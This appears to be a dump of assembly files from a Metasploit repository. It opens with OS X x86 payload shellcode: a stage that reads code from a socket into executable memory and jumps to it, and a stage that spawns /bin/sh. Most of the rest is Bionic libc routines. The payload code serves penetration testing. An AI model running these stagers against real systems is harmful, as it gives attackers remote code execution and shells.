call eax
;; run_symbol = NSLookupSymbolInModule(module, "_run")
mov ebx, eax
xor eax, eax
push eax ; "\0\0\0\0"
push 0x6e75725f ; "_run"
mov eax, esp
push eax ; sym
push ebx ; module
ror13_hash "_NSLookupSymbolInModule"
push dword hash
call _dyld_resolve
call eax
;; NSAddressOfSymbol(run_symbol)
sub esp, 12 ; maintain alignment
push eax
ror13_hash "_NSAddressOfSymbol"
push dword hash
call _dyld_resolve
call eax
;; _run(socket)
sub esp, 12 ; maintain alignment
push esi
call eax
.error:
;; Exit cleanly
xor eax, eax
push eax ; EXIT_SUCCESS
push eax ; spacer
mov al, 1
int 0x80
|
OpenWireSec/metasploit | 1,077 | external/source/osx/x86/include/_read_exec.s | _read_exec:
;; Save some stack space
mov ebp, esp
sub esp, byte 8
.loop:
xor ecx, ecx ; clear ecx
mul ecx ; clear eax and edx
;; Read a 4-byte size of code fragment to execute
push ecx
mov esi, esp
mov al, 4
push eax ; nbyte
push esi ; buf
push edi ; s
push eax
dec eax
int 0x80
jb end
mov esi, [esp+16] ; code buffer length
;; mmap memory
xor eax, eax
push eax ; alignment spacer
push eax ; 0
dec eax
push eax ; -1
inc eax
mov ax, 0x1002
push eax ; (MAP_ANON | MAP_PRIVATE)
xor eax, eax
mov al, 7
push eax ; (PROT_READ | PROT_WRITE | PROT_EXEC)
push esi ; len
push edx ; addr
push edx ; spacer
mov al, 197
int 0x80
jb end
;; read fragment from file descriptor into mmap buffer
mov ebx, eax
add ebx, esi
.read_fragment:
push esi ; nbytes
mov eax, ebx
sub eax, esi
push eax ; buf
push edi ; s
push edx ; spacer
xor eax, eax
mov al, 3
int 0x80 ; read(edi, eax, esi)
jb end
sub ebx, eax ; Subtract bytes read to buf end pointer
sub esi, eax ; Subtract bytes read from total
jnz .read_fragment
jmp ebx
|
OpenWireSec/metasploit | 1,090 | external/source/osx/x86/include/_shell.s | _shell:
;; Test if vfork() will be needed. If execve(0, 0, 0) fails with
;; ENOTSUP, then we are in a threaded process and need to call
;; vfork().
xor eax, eax
push eax ; envp
push eax ; argv
push eax ; path
push eax
mov al, 59 ; SYS_execve
int 0x80
nop
nop
cmp al, 45 ; ENOTSUP
jne .execve_binsh
.vfork:
mov al, 66 ; SYS_vfork
int 0x80 ; vfork()
cmp edx, byte 0
jz .wait
;; Both child and parent continue to run execve below. The parent
;; fails and falls through to call wait4(), the child succeeds
;; and obviously doesn't call wait4() since it has exec'd a new
;; executable.
.execve_binsh:
xor eax, eax
push eax ; "\0\0\0\0"
push 0x68732f2f ; "//sh"
push 0x6e69622f ; "/bin"
mov ebx, esp
push eax ; envp
push eax ; argv
push ebx ; path
push eax ; spacer
mov al, 59 ; SYS_execve
int 0x80
.wait:
;; Wait for child process to exit before continuing and crashing
xor eax, eax
push eax
mov ebx, esp
push eax ; rusage
push eax ; options
push ebx ; stat_loc
push eax ; pid
push eax ; spacer
mov al, 7
int 0x80
|
OpenWireSec/metasploit | 1,668 | external/source/meterpreter/source/bionic/libc/private/__dso_handle.S | /*
* Copyright (C) 2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
# The __dso_handle global variable is used by static
# C++ constructors and destructors in the binary.
# See http://www.codesourcery.com/public/cxx-abi/abi.html#dso-dtor
#
.section .bss
.align 4
.globl __dso_handle
__dso_handle:
.long 0
|
OpenWireSec/metasploit | 1,833 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/atomic_cmpxchg.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.type __atomic_cmpxchg, @function
.globl __atomic_cmpxchg
.align 4
__atomic_cmpxchg:
mova 1f, r0
nop
mov r15, r1
mov #-8, r15 /* critical region start */
0: mov.l @r6, r2
cmp/eq r2, r4
bt not_yet_modified
mov #1, r0
bra done
nop
not_yet_modified:
mov #0, r0
mov.l r5, @r6
done:
1: mov r1, r15 /* critical region end */
rts
nop
|
OpenWireSec/metasploit | 4,284 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/setjmp.S | /* $OpenBSD: setjmp.S,v 1.2 2007/03/02 06:11:54 miod Exp $ */
/* $NetBSD: setjmp.S,v 1.10 2006/01/05 19:21:37 uwe Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* from: @(#)setjmp.s 5.1 (Berkeley) 4/23/90
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- setjmp, longjmp
*
* longjmp(a,v)
* will generate a "return(v)" from the last call to
* setjmp(a)
* by restoring registers from the stack.
* The previous signal state is restored.
*/
ENTRY(setjmp)
PIC_PROLOGUE(.L_got_1)
sts.l pr, @-sp
mov.l r4, @-sp
mov.l .L_sigprocmask_1, r0
mov r4, r6
mov #1, r4 /* how = SIG_BLOCK */
mov #0, r5 /* new = NULL */
1: CALL r0
add #4, r6 /* old = &sigmask */
mov.l @sp+, r4
lds.l @sp+, pr
PIC_EPILOGUE
/* identical to _setjmp except that the first word is non-zero */
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
add #(_JBLEN * 4), r4
sts fpscr, r1
xor r0, r0
mov.l r1, @-r4
lds r0, fpscr
sts.l fpul, @-r4
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
frchg
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
lds r1, fpscr
#else
add #((_JBLEN - 10) * 4), r4
#endif
sts.l mach, @-r4
sts.l macl, @-r4
mov.l r15, @-r4
mov.l r14, @-r4
mov.l r13, @-r4
mov.l r12, @-r4
mov.l r11, @-r4
mov.l r10, @-r4
mov.l r9, @-r4
mov.l r8, @-r4
sts.l pr, @-r4
add #-4, r4 /* skip signal mask */
mov #1, r0
mov.l r0, @-r4 /* has signal mask */
rts
xor r0, r0
.align 2
.L_got_1: PIC_GOT_DATUM
.L_sigprocmask_1: CALL_DATUM(_C_LABEL(sigprocmask), 1b)
SET_ENTRY_SIZE(setjmp)
ENTRY(longjmp)
/* we won't return here, so we don't need to save pr and r12 */
PIC_PROLOGUE_NOSAVE(.L_got_2)
mov.l r5, @-sp
mov.l r4, @-sp
mov.l .L_sigprocmask_2, r0
mov r4, r5
mov #3, r4 /* how = SIG_SETMASK */
add #4, r5 /* new = &sigmask */
1: CALL r0
mov #0, r6 /* old = NULL */
mov.l @sp+, r4
mov.l @sp+, r5
/* identical to _longjmp */
add #8, r4
lds.l @r4+, pr
mov.l @r4+, r8
mov.l @r4+, r9
mov.l @r4+, r10
mov.l @r4+, r11
mov.l @r4+, r12
mov.l @r4+, r13
mov.l @r4+, r14
mov.l @r4+, r15
lds.l @r4+, macl
lds.l @r4+, mach
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
xor r0, r0
lds r0, fpscr
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
lds.l @r4+, fpul
lds.l @r4+, fpscr
#endif
mov r5, r0
tst r0, r0 /* make sure return value is non-zero */
bf .L0
add #1, r0
.L0:
rts
nop
.align 2
.L_got_2: PIC_GOT_DATUM
.L_sigprocmask_2: CALL_DATUM(_C_LABEL(sigprocmask), 1b)
SET_ENTRY_SIZE(longjmp)
|
OpenWireSec/metasploit | 1,432 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/bzero.S | /*
* Copyright (C) 2009 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#define BZERO
#include "memset.S"
|
OpenWireSec/metasploit | 4,254 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/sigsetjmp.S | /* $OpenBSD: sigsetjmp.S,v 1.2 2007/03/02 06:11:54 miod Exp $ */
/* $NetBSD: sigsetjmp.S,v 1.9 2006/01/05 19:21:37 uwe Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* William Jolitz.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* from: @(#)setjmp.s 5.1 (Berkeley) 4/23/90
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
ENTRY(sigsetjmp)
tst r5, r5 /* if (savemask == 0) */
bt 2f
/* identical to setjmp */
PIC_PROLOGUE(.L_got_1)
sts.l pr, @-sp
mov.l r4, @-sp
mov.l r5, @-sp
mov.l .L_sigprocmask_1, r0
mov r4, r6
mov #1, r4 /* how = SIG_BLOCK */
mov #0, r5 /* new = NULL */
1: CALL r0
add #4, r6 /* old = &sigmask */
mov.l @sp+, r5
mov.l @sp+, r4
lds.l @sp+, pr
PIC_EPILOGUE
2: /* identical to _setjmp except that first word is in r5 */
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
add #(_JBLEN * 4), r4
sts fpscr, r1
xor r0, r0
mov.l r1, @-r4
lds r0, fpscr
sts.l fpul, @-r4
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
frchg
fmov.s fr15, @-r4
fmov.s fr14, @-r4
fmov.s fr13, @-r4
fmov.s fr12, @-r4
lds r1, fpscr
#else
add #((_JBLEN - 10) * 4), r4
#endif
sts.l mach, @-r4
sts.l macl, @-r4
mov.l r15, @-r4
mov.l r14, @-r4
mov.l r13, @-r4
mov.l r12, @-r4
mov.l r11, @-r4
mov.l r10, @-r4
mov.l r9, @-r4
mov.l r8, @-r4
sts.l pr, @-r4
add #-4, r4 /* skip signal mask */
mov.l r5, @-r4 /* has signal mask? */
rts
xor r0, r0
.align 2
.L_got_1: PIC_GOT_DATUM
.L_sigprocmask_1: CALL_DATUM(_C_LABEL(sigprocmask), 1b)
SET_ENTRY_SIZE(sigsetjmp)
ENTRY(siglongjmp)
mov.l @r4+, r0
tst r0, r0
bt 2f /* if no mask */
/* identical to longjmp */
/* we won't return here, so we don't need to save pr and r12 */
PIC_PROLOGUE_NOSAVE(.L_got_2)
mov.l r5, @-sp
mov.l r4, @-sp
mov.l .L_sigprocmask_2, r0
mov r4, r5 /* new = &sigmask */
mov #3, r4 /* how = SIG_SETMASK */
1: CALL r0
mov #0, r6 /* old = NULL */
mov.l @sp+, r4
mov.l @sp+, r5
2: /* identical to _longjmp */
add #4, r4
lds.l @r4+, pr
mov.l @r4+, r8
mov.l @r4+, r9
mov.l @r4+, r10
mov.l @r4+, r11
mov.l @r4+, r12
mov.l @r4+, r13
mov.l @r4+, r14
mov.l @r4+, r15
lds.l @r4+, macl
lds.l @r4+, mach
#if defined(__SH4__) && !defined(__SH4_NOFPU__)
xor r0, r0
lds r0, fpscr
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
frchg
fmov.s @r4+, fr12
fmov.s @r4+, fr13
fmov.s @r4+, fr14
fmov.s @r4+, fr15
lds.l @r4+, fpul
lds.l @r4+, fpscr
#endif
mov r5, r0
tst r0, r0 /* make sure return value is non-zero */
bf .L0
add #1, r0
.L0:
rts
nop
.align 2
.L_got_2: PIC_GOT_DATUM
.L_sigprocmask_2: CALL_DATUM(_C_LABEL(sigprocmask), 1b)
SET_ENTRY_SIZE(siglongjmp)
|
OpenWireSec/metasploit | 2,799 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/crtbegin_static.S | /*
* Copyright (C) 2009-2010 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.align 4
.type _start,#function
.globl _start
# this is the small startup code that is first run when
# any executable that is statically-linked with Bionic
# runs.
#
# it's purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
mov r15, r4
mov #0, r5
mov.l 0f, r6
mova 2f, r0
mov r0, r7
mov.l 1f, r0
jmp @r0
nop
.balign 4
0: .long main
1: .long __libc_init
2: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
OpenWireSec/metasploit | 2,956 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/ffs.S | /* $NetBSD: ffs.S,v 1.1 2005/12/20 19:28:50 christos Exp $ */
/*-
* Copyright (c) 2002 The NetBSD Foundation, Inc.
* All rights reserved.
*
* This code is derived from software contributed to The NetBSD Foundation
* by ITOH Yasufumi.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by the NetBSD
* Foundation, Inc. and its contributors.
* 4. Neither the name of The NetBSD Foundation nor the names of its
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS
* ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include <machine/asm.h>
#if defined(LIBC_SCCS) && !defined(lint)
RCSID("$NetBSD: ffs.S,v 1.1 2005/12/20 19:28:50 christos Exp $")
#endif
/*
* ffs - find first bit set
*
* This code makes use of ``test 8bit'' and ``shift 8bit'' instructions.
* The remaining 8bit is tested in every 2bit.
*/
ENTRY(ffs)
mov r4,r0 ! using r0 specific instructions
tst #0xff,r0
bf/s L8bit
mov #0+1,r1 ! ret = 1..8
tst r0,r0 ! ffs(0) is 0
bt Lzero ! testing here to accelerate ret=1..8 cases
shlr8 r0
tst #0xff,r0
bf/s L8bit
mov #8+1,r1 ! ret = 9..16
shlr8 r0
tst #0xff,r0
bf/s L8bit
mov #16+1,r1 ! ret = 17..24
shlr8 r0
mov #24+1,r1 ! ret = 25..32
L8bit:
tst #0x0f,r0
bt 4f
tst #0x03,r0
bt 2f
tst #0x01,r0 ! not bit 0 -> T
mov #0,r0
rts
addc r1,r0 ! 0 + r1 + T -> r0
2: tst #0x04,r0
mov #2,r0
rts
addc r1,r0
4: tst #0x30,r0
bt 6f
tst #0x10,r0
mov #4,r0
rts
addc r1,r0
6: tst #0x40,r0
mov #6,r0
rts
addc r1,r0
Lzero: rts
nop
|
OpenWireSec/metasploit | 6,642 | external/source/meterpreter/source/bionic/libc/arch-sh/bionic/memcpy.S | /* $OpenBSD: memcpy.S,v 1.1.1.1 2006/10/10 22:07:10 miod Exp $ */
/* $NetBSD: memcpy.S,v 1.2 2006/04/22 23:53:47 uwe Exp $ */
/*
* Copyright (c) 2000 SHIMIZU Ryo <ryo@misakimix.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. The name of the author may not be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <machine/asm.h>
#if !defined(MEMCOPY) && !defined(MEMMOVE) && !defined(BCOPY)
#define MEMCOPY
#endif
#if defined(MEMCOPY) || defined(MEMMOVE)
#define REG_DST0 r3
#define REG_SRC r5
#define REG_DST r4
#else
#define REG_SRC r4
#define REG_DST r5
#endif
#define REG_LEN r6
#if defined(MEMCOPY)
ENTRY(memcpy)
#elif defined(MEMMOVE)
ENTRY(memmove)
#elif defined(BCOPY)
ENTRY(bcopy)
#endif
#ifdef REG_DST0
mov REG_DST,REG_DST0
#endif
cmp/eq REG_DST,REG_SRC /* if ( src == dst ) return; */
bt/s bcopy_return
cmp/hi REG_DST,REG_SRC
bf/s bcopy_overlap
mov REG_SRC,r0
xor REG_DST,r0
and #3,r0
mov r0,r1
tst r0,r0 /* (src ^ dst) & 3 */
bf/s word_align
longword_align:
tst REG_LEN,REG_LEN /* if ( len==0 ) return; */
bt/s bcopy_return
mov REG_SRC,r0
tst #1,r0 /* if ( src & 1 ) */
bt 1f
mov.b @REG_SRC+,r0 /* *dst++ = *src++; */
add #-1,REG_LEN
mov.b r0,@REG_DST
add #1,REG_DST
1:
mov #1,r0
cmp/hi r0,REG_LEN /* if ( (len > 1) && */
bf/s 1f
mov REG_SRC,r0
tst #2,r0 /* (src & 2) { */
bt 1f
mov.w @REG_SRC+,r0 /* *((unsigned short*)dst)++ = *((unsigned short*)src)++; */
add #-2,REG_LEN /* len -= 2; */
mov.w r0,@REG_DST
add #2,REG_DST /* } */
1:
mov #3,r1
cmp/hi r1,REG_LEN /* while ( len > 3 ) { */
bf/s no_align_delay
tst REG_LEN,REG_LEN
2:
mov.l @REG_SRC+,r0 /* *((unsigned long*)dst)++ = *((unsigned long*)src)++; */
add #-4,REG_LEN /* len -= 4; */
mov.l r0,@REG_DST
cmp/hi r1,REG_LEN
bt/s 2b
add #4,REG_DST /* } */
bra no_align_delay
tst REG_LEN,REG_LEN
word_align:
mov r1,r0
tst #1,r0
bf/s no_align_delay
tst REG_LEN,REG_LEN /* if ( len == 0 ) return; */
bt bcopy_return
mov REG_SRC,r0 /* if ( src & 1 ) */
tst #1,r0
bt 1f
mov.b @REG_SRC+,r0 /* *dst++ = *src++; */
add #-1,REG_LEN
mov.b r0,@REG_DST
add #1,REG_DST
1:
mov #1,r1
cmp/hi r1,REG_LEN /* while ( len > 1 ) { */
bf/s no_align_delay
tst REG_LEN,REG_LEN
2:
mov.w @REG_SRC+,r0 /* *((unsigned short*)dst)++ = *((unsigned short*)src)++; */
add #-2,REG_LEN /* len -= 2; */
mov.w r0,@REG_DST
cmp/hi r1,REG_LEN
bt/s 2b
add #2,REG_DST /* } */
no_align:
tst REG_LEN,REG_LEN /* while ( len!= ) { */
no_align_delay:
bt bcopy_return
1:
mov.b @REG_SRC+,r0 /* *dst++ = *src++; */
add #-1,REG_LEN /* len--; */
mov.b r0,@REG_DST
tst REG_LEN,REG_LEN
bf/s 1b
add #1,REG_DST /* } */
bcopy_return:
rts
#ifdef REG_DST0
mov REG_DST0,r0
#else
nop
#endif
bcopy_overlap:
add REG_LEN,REG_SRC
add REG_LEN,REG_DST
mov REG_SRC,r0
xor REG_DST,r0
and #3,r0
mov r0,r1
tst r0,r0 /* (src ^ dst) & 3 */
bf/s ov_word_align
ov_longword_align:
tst REG_LEN,REG_LEN /* if ( len==0 ) return; */
bt/s bcopy_return
mov REG_SRC,r0
tst #1,r0 /* if ( src & 1 ) */
bt 1f
add #-1,REG_SRC /* *--dst = *--src; */
mov.b @REG_SRC,r0
mov.b r0,@-REG_DST
add #-1,REG_LEN
1:
mov #1,r0
cmp/hi r0,REG_LEN /* if ( (len > 1) && */
bf/s 1f
mov REG_SRC,r0
tst #2,r0 /* (src & 2) { */
bt 1f
